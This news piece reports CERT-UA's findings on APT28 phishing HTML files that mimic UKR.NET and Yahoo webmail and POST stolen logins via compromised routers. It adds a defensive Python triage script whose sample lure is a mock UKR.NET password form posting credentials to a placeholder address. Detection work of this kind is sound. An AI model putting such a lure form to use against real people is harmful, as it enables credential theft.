New cyberattack aims to steal email login credentials


CERT-UA, the Ukrainian government’s computer emergency response team, has detected and investigated a wave of phishing attacks by the APT28 hacker group (also known as Pawn Storm, Fancy Bear, BlueDelta) aimed at obtaining the authentication data Ukrainians use to log in to public email services.

According to CERT-UA experts, the attackers send HTML files that imitate the web interface of email services (in particular, UKR.NET and Yahoo.com) and transmit the authentication data entered by the victim via HTTP POST requests. The stolen data is transmitted using previously compromised Ubiquiti devices (EdgeOS).
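One way a mail gateway or analyst could triage HTML attachments of the kind described above, as an added example that is not from CERT-UA or the original article: it flags a password form whose action posts to a host outside the brand the page imitates. The brand-to-host map, the form-action-only heuristic (script-driven POSTs are not covered) and the sample documents, which use the documentation address 192.0.2.10, are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts a genuine login page for each imitated brand would post to.
BRAND_HOSTS = {"ukr.net": ("ukr.net",), "yahoo": ("yahoo.com",)}

class FormScan(HTMLParser):
    """Collect each <form> action and whether the form holds a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []   # one dict per <form>
        self.text = []    # lowercased visible text, used for brand matching

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "",
                               "method": (a.get("method") or "get").lower(),
                               "has_password": False})
        elif tag == "input" and (a.get("type") or "").lower() == "password" and self.forms:
            self.forms[-1]["has_password"] = True

    def handle_data(self, data):
        self.text.append(data.lower())

def scan_attachment(html):
    """Return findings for password forms that post to a non-brand host."""
    p = FormScan()
    p.feed(html)
    page_text = " ".join(p.text)
    brands = [b for b in BRAND_HOSTS if b in page_text]
    findings = []
    for f in p.forms:
        host = urlparse(f["action"]).hostname or ""
        if not f["has_password"] or not host:
            continue  # no credential field, or a relative action with no remote target
        legit = any(host == h or host.endswith("." + h)
                    for b in brands for h in BRAND_HOSTS[b])
        if not legit:
            findings.append({"brands": brands, "post_host": host, "method": f["method"]})
    return findings

# Constructed samples (not taken from the campaign).
SAMPLE_LURE = """<html><head><title>UKR.NET Mail</title></head><body>
<form method="POST" action="http://192.0.2.10/login.php">
<input type="text" name="login"><input type="password" name="pass">
</form></body></html>"""
SAMPLE_BENIGN = """<html><body><h1>Yahoo newsletter</h1>
<form method="get" action="https://search.yahoo.com/search"><input type="text" name="p">
</form></body></html>"""
```

A finding is a triage signal rather than a verdict: the attachment still needs review before any blocking decision.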

In June, CERT-UA, in cooperation with Recorded Future, revealed the APT28 (BlueDelta) group’s espionage campaign against Ukrainian organizations.

The Governmental Computer Emergency Response Team of Ukraine (CERT-UA) calls on the responsible employees of organizations not to ignore reports of detected signs of anomalous activity and to take immediate measures to reduce the attack surface.
